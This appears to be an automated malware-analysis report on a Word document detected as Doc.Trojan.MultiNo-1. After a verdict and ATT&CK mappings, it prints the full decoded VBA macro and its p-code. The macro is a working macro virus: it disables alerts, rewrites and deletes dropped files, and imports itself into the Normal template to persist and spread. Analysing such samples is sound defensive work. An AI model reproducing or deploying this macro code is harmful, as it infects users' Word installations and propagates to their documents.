Verdict: MALICIOUS
Risk Score: 80

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing VBA macros. Its AutoExec subroutine checks for 'c:\logov.sys'; if that file is absent, it reads 'c:\logoz.sys' line by line, rewrites every line whose fifth character is ':' into a `Print #1, "e..."` statement, writes the result to 'c:\logov.sys' and deletes the original. It then imports 'c:\logov.sys' as a VBA component into the Normal template (unless a component named "MultiNO" already exists) and saves the template, which is a common technique for establishing persistence or downloading further stages. The ClamAV detection 'Doc.Trojan.MultiNo-1' further supports its malicious nature.
Heuristics (2)
- ClamAV: Doc.Trojan.MultiNo-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.MultiNo-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3544 bytes |

SHA-256: d86e89187dea4d2129ed12ba04c46d4e82a2b42b7135d0dde731c03f020ea281
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "iMultiNO"
Sub AutoExec()
On Error GoTo E
Application.DisplayAlerts = False
Application.EnableCancelKey = wdDisabled
On Error GoTo make
Open "c:\logov.sys" For Input As #1
Close 1
GoTo imprt
make:
On Error GoTo E
Open "c:\logoz.sys" For Input As #1
Open "c:\logov.sys" For Output As #2
Do
Line Input #1, a$
If Mid$(a$, 5, 1) = ":" Then a$ = "Print #1, " + Chr$(34) + "e" + Mid$(a$, 6, 29) + " " + Mid$(a$, 36, 23) + Chr$(34)
Print #2, a$
Loop Until EOF(1)
Close
Kill "c:\logoz.sys"
imprt:
n = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To n
If NormalTemplate.VBProject.VBComponents(i).Name = "MultiNO" Then GoTo E
Next i
NormalTemplate.VBProject.VBComponents.Import ("c:\logov.sys")
NormalTemplate.Save
E:
End Sub
' Processing file: /opt/analyzer/scan_staging/b8f237aca28149bf8e30f01cf7dba471.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/iMultiNO - 2138 bytes
' Line #0:
' FuncDefn (Sub AutoExec())
' Line #1:
' OnError E
' Line #2:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #3:
' Ld wdDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #4:
' OnError make
' Line #5:
' LitStr 0x000C "c:\logov.sys"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #6:
' LitDI2 0x0001
' Close 0x0001
' Line #7:
' GoTo imprt
' Line #8:
' Label make
' Line #9:
' OnError E
' Line #10:
' LitStr 0x000C "c:\logoz.sys"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #11:
' LitStr 0x000C "c:\logov.sys"
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #12:
' Do
' Line #13:
' LitDI2 0x0001
' Ld a$
' LineInput
' Line #14:
' Ld a$
' LitDI2 0x0005
' LitDI2 0x0001
' ArgsLd Mid$$ 0x0003
' LitStr 0x0001 ":"
' Eq
' If
' BoSImplicit
' LitStr 0x000A "Print #1, "
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Add
' LitStr 0x0001 "e"
' Add
' Ld a$
' LitDI2 0x0006
' LitDI2 0x001D
' ArgsLd Mid$$ 0x0003
' Add
' LitStr 0x0001 " "
' Add
' Ld a$
' LitDI2 0x0024
' LitDI2 0x0017
' ArgsLd Mid$$ 0x0003
' Add
' LitDI2 0x0022
' ArgsLd Chr$ 0x0001
' Add
' St a$
' EndIf
' Line #15:
' LitDI2 0x0002
' Sharp
' PrintChan
' Ld a$
' PrintItemNL
' Line #16:
' LitDI2 0x0001
' ArgsLd EOF 0x0001
' LoopUntil
' Line #17:
' CloseAll
' Line #18:
' LitStr 0x000C "c:\logoz.sys"
' ArgsCall Kill 0x0001
' Line #19:
' Label imprt
' Line #20:
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St n
' Line #21:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld n
' For
' Line #22:
' Ld i
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0007 "MultiNO"
' Eq
' If
' BoSImplicit
' GoTo E
' EndIf
' Line #23:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #24:
' LitStr 0x000C "c:\logov.sys"
' Paren
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #25:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #26:
' Label E
' Line #27:
' EndSub